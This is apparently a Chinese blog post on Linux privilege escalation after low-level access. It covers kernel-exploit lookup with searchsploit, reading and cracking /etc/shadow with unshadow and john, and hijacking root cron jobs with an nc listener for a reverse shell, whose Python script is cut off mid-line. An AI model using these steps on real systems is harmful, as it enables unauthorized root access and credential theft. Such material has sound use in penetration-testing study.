Linux提权思路

提权思路


  • 当我们已经获取目标机器的较低权限时,我们需要扩大战果来提升权限。

  1. 查看系统发行版本cat /etc/issue或者cat /etc/*-release,查看内核信息uname -a。根据版本信息使用searchsploit xxx来查询发行的内核版本是否存在内核溢出漏洞,如果存在漏洞可以直接利用漏洞代码来提升权限:
    * 上传漏洞代码,使用gcc xxx.c -o exploit将代码编译成名为exploit的可执行文件
    * chmod +x exploit赋予执行权限
    * ./exploit执行漏洞进行提权
  2. 明文root密码提权,查看/etc/shadows里面存储密码的hash(一般只有root权限可读),如果可以查看到shadow里面的密码:
    * 进入etc目录下
    * 使用unshadow passwd shadow >cracked
    * john cracked进行破解密码
  3. 计划任务,系统中会存在一些定时执行的任务,可以使用cat /etc/crontab查看定时任务,是否可以替换root定时执行的文件来获取root权限。如果存在.py文件可以使用如下python脚本代替。攻击机上使用nc -nlvp 4444监听4444端口
    *
    #!/usr/bin/python
    import socket,subproce
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值